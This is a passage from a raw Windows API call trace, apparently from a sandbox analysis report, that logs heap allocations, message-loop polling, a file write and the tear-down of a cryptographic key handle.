hHeap=0x970000) returned 1 [0231.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0231.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0231.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0231.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0231.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0231.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0231.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0231.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0231.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0231.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0231.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0231.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0231.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0231.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0231.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0231.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0231.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0231.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0231.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0231.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0231.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0231.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0231.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0231.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0231.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0231.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f350 | out: hHeap=0x970000) returned 1 [0231.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0231.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0231.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0231.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978518 | out: hHeap=0x970000) returned 1 [0231.374] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552a8 [0231.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55298 [0231.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55178 [0231.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0231.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55238 [0231.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55238 | out: hHeap=0x970000) returned 1 [0231.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0231.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0231.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0231.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0231.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0231.425] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0231.425] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551c8 [0231.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0231.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0231.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0231.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0231.425] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0231.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0231.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0231.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0231.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0231.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0231.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0231.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0231.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0231.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0231.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0231.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0231.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0231.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xad30) returned 0x2f3fce0 [0231.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0231.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0231.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0231.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0231.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0231.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0231.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0231.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0231.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0231.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0231.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0231.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0231.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xad30) returned 0x2e80330 [0231.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f3fce0 | out: hHeap=0x970000) returned 1 [0231.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0231.429] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0231.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0231.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0231.429] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0231.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0231.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0231.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0231.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0231.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0231.430] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0231.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0231.430] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0231.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0231.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0231.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511f0 [0231.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0231.430] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0231.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043f0 [0231.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0231.430] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0231.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043f0 | out: hHeap=0x970000) returned 1 [0231.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0231.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51070 [0231.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0231.430] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0231.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0231.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0231.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0231.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0231.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0231.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0231.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0231.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0231.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0231.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512b0 [0231.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0231.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51040 [0231.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51208 [0231.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510b8 [0231.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0231.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0231.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510a0 [0231.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51238 [0231.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51280 [0231.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0231.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0231.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0231.432] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0231.432] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0231.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0231.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043b8 [0231.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0231.432] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0231.432] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0231.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0231.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0231.433] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0231.433] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0231.433] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0231.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0231.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0231.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0231.446] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0231.447] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.447] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0231.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0231.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0231.448] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f14818*, nNumberOfBytesToWrite=0xad30, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f14818*, lpNumberOfBytesWritten=0x8cf5e4*=0xad30, lpOverlapped=0x0) returned 1 [0231.508] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0231.508] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0231.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0231.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0231.514] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0231.514] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0231.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0231.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0231.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0231.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0231.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0231.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5f8 [0231.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0231.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0231.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0231.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0231.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0231.514] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0231.514] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0231.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0231.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0231.515] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0231.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0231.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0231.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0231.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0231.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0231.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0231.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0231.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0231.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0231.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0231.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0231.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0231.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0231.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0231.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0231.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0231.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0231.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0231.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0231.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0231.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0231.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51118, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0231.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0231.516] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0231.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0231.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0231.516] CryptDestroyKey (hKey=0xa87310) returned 1 [0231.517] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0231.517] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0231.517] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0231.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0231.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0231.517] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0231.517] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0231.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f040a8 | out: hHeap=0x970000) returned 1 [0231.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0231.517] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0231.517] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0231.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0231.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0231.517] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0231.518] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0231.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04348 | out: hHeap=0x970000) returned 1 [0231.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0231.518] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0231.518] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, 